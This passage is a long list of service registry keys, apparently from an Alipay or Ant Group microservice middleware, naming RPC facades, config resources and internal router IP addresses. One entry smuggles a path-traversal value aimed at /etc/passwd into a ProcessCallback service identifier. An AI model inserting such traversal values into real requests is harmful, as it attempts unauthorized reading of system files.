ofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.integration.rcconsultcore.RcconsultcoreServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.124#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.biz.drm.TaskAutoEndResource.oldAutoEnd,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.certifymng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.membercenterTairCache.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.etetestprod.core.service.playback.PlaybackQueryDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_HSF_HIGH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transferprod.common.service.facade.api.TransferFeeConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.bops.TemplateDeveloperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_REFUND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.certifycenter.service.withdraw.CertifyWithdrawManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:signSuccessOrderHandle@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.GroupInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omp.common.service.facade.api.ActivityPageElementsQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.232.38#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.antgroup.zmxy.zmratecust.common.service.facade.rate.account.RateAccountManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:oasistwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.smdd.facade.isv.LSMDD4IsvItemQueryByShopFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:kBShopSyncMifHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.data.MiniDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.appointment.AppointmentViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.0.161.234#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mquery.common.service.facade.report.PayToolAsReportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.dev.MiniReleaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcinstdata.common.service.facade.service.assetlimit.AssetLimitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.154.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.ifundcontrolmodel.service.facade.api.EntityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.InsProductDrmClient.adsProdCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.fundcenter.common.service.facade.api.FundCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rulemng.common.service.facade.template.RuleBizTemplateService:1.0:promo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecbill.common.service.fee.FeeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetpreference.api.facade.IndexClassifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.200.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cap.common.service.CapAccessKeyService:1.0:antcloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ufe.offline.mng.facade.service.SimulationMngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.crmhome.biz.service.impl.openapi.IMerchantEquipmentQueryProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.confcenter.manager.AppRuleRelationManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoplaycenter.common.service.facade.api.PrizeOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.96.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.abilitycore.common.service.facade.std.AbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.122.82#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ordermng:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_ACXBOSSCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.DatamoveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:alipaypointcust@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdMerchantSearchQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.StockCompanyLogoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.idatacontextTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.irecon.common.service.query.fund.api.AcquirerVersionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkinterbankcenter.common.service.facade.api.InterbankInstInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.bizProductBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.service.facade.service.InspectServiceDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpartner.common.service.facade.RebateAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insxhbclaimprod.common.service.facade.ClaimPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.findtprod:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.167.123.15#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:agdsroalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mydds:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.ResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.40.50#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","secuinfos@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.etetestcore.service.api.WithdrawAckService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.wireless.IsvCorpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:/........................................................................../../../../../../../../etc/passwd@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.biz.shared.rest.application.ApplicationPrivateRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.echox.service.EchoxAopPlaybackService:1.0:inshealthclaimmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.template.TemplateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.24.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_O_ZFALCON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.158.87.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilecodec.common.spi.service.MobileCodecShareCodeService:1.0:wufu@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afx.tr.server.facade.SampleService:1.0:uniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.BackGroundQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecomerchant.facade.isv.admin.IsvQueryAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.schedule.calculate.drm.ProfitCalculateDRMResource.autoRemoveKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilelbs.common.service.facade.ldc.MobilelbsUserServiceInRZone:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.16#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.conf.MenuConfManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0:SYJ_DeployProductAuditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.flab.api.DeviceStatusService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.biztask.facade.EventManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.test.DfinsightTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapires.facade.api.ApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.checkroute.biz.service.impl.rest.DenoiseRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.frastress.common.service.facade.api.FundDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PROMOX#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.community.api.speech.topic.TopicFeedsGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_JINRONGYUN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.hyp.common.service.facade.EventSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbitemprod.biz.service.impl.test.bg.BgTestService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxian.ipp.service.facade.InsTradeDetailFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicore.common.service.facade.appproperty.api.AppPropertyMetaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.chargefront.biz.service.schedule.escort.EscortDrm.phoneEscortSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.reading.common.service.facade.game.SubDomainLevelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerelation.common.service.facade.tlou.TlouRelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.210.241#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilepep.service.facade.backend.CardAbTestApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.cashing.facade.AssetCashingApplyQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.dataset.DataSetTaskInstanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.growthplus.ai.AnalysisTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_CSACCURATE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.appxcore.common.service.facade.api.tag.TagMngConfigNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.material.mng.DynamicTemplateManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ecdcc:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.vpc.ElasticIPFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.omocore.common.service.facade.MemoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.acsellcore.common.service.facade.contract.ContractManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.L2PriceByVolumeSnapshotFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:spcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.inner.GiftCrowdInviteRzService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.question.api.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.openapi.AlertService:1.0:dpide@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpc.dasaa.facade.adala.DasaaAdalaFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.openapi.clientswitch.ClientSwitchOpsOpenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.CardPublishFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_GOTONE_MESSAGE_RECEIVE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.bizfundprod.common.service.facade.transfer.SingleTransQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.ipay.imerchprod.ipaysales.facade.api.contract.IpaysalesContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.rutao.AlscActivityMockTransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.UserCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antmembermng.common.service.facade.dataoperation.PlatformDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.SearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitycore.common.service.facade.riskrank.CustomerRiskRankService:1.0:uctlite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.133.220#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.intl.idataops.job.service.JobOperationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.alipayrelation.AlipayUserEnergyQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mwalletmng:name=com.alipay.mwalletmng.biz.luckymoney.drm.LuckMoneyDRMResource.blessTaskAppMaxVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.compmng.service.facade.CompensationQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-insxhcprod_task#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.secure-false-app:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.guardianConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:balSubAccAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.icifTairCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.com.antcloud.acticketcore.kernel.common.service.facade.UserFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.wishsavings.drm.impl.WishSavingsSysDRMResource.manualStarWishContractId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dataphin.dpchangeguardian.common.facade.rule.ChangeRuleApi:1.0:dpchangeguardian@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.core.service.taskflow.repo.YebcAccessConfigRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.operation.ServiceDiagnosisViewMngQueryFacade:1.0:APPXCORE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.content.YuemaContentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.gw.topic.api.TopicVideoGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:loginantzhixin#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditsceneprod.facade.PcreditCharityRepayInvitationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasecore.service.attribute.facade.AttributeTypeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecoqltprod.common.service.facade.tinyapp.TinyappFailureFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:cdpProcessTaskCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.psbp.common.service.medical.InsuranceCardInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.gfas:name=com.alipay.gfas.core.config.drm.GfasVersionControlDrmResource.routeDecisonVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imemberprod.service.facade.api.ProfileQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.cashier.common.service.facade.spi.PayOrderResolveService:1.0:apacquirecenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ipciConfigTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.midasCommonTair.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipassprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:watchlist-task-online@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:findecision@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArBillCreateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.100.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:mcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.development.common.facade.api.StreamJobTestApi:1.0:dpstreaming@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ebpp.InstGeographyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.mrch.common.service.api.VerifyInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-crmhome-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.opencore.service.facade.message.MessageSubQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.96.240#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditplan.common.prod.pay.PcreditPlanPayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.62.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.malgo.common.facade.BlessingCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkloandecision.service.facade.agds.CainiaoValidShopQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbpdcenter.common.service.salesprod.proxy.ProxyInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphaq.common.facade.label.api.WorkFlowService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.TfAPIFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestcore.common.service.facade.service.settle.SettleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_COVERAGECENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.service.facade.coupon.GiftCardFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditcore.installment.service.PcreditBillInstallmentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveService:1.0:instradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainScope,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.crab.protocol.tr.TrJsonService:1.0:charityasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paydecisioncarina.service.client.playback.publish.CarinaTrProxyFacade:1.0:assetfluxdecision@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.client.serivce.ExterfaceInvokeService:1.0:insassetprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.msgopprod.common.service.facade.marketing.MsgMarketingManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.233#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.sceneCodeIgnoredRcp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantCodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.125.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_O_PROJECT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pcreditauthprod.service.facade.migration.PcreditEasyMemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.isNeedQueryBxProdPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.UserControlRightService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autobizcore.common.fundamental.datafacade.TestcaseGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instbill.common.service.facade.model.api.QueryBillConfigInfo:1.0:instbill@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.CommonBuyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.livetradeprod.service.facade.api.ResultPageRenderSpiFacade:1.0:promoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.dailycut.api.DailyCollectTransService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.common.McommentCommonUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmResourceManager.ccrCardNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mymdp.common.service.facade.mpscore.service.route.MpsRouteService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bpaas.ecogw.facade.EcoGwTestFacade:1.0:ecoGwTestFacade_generic@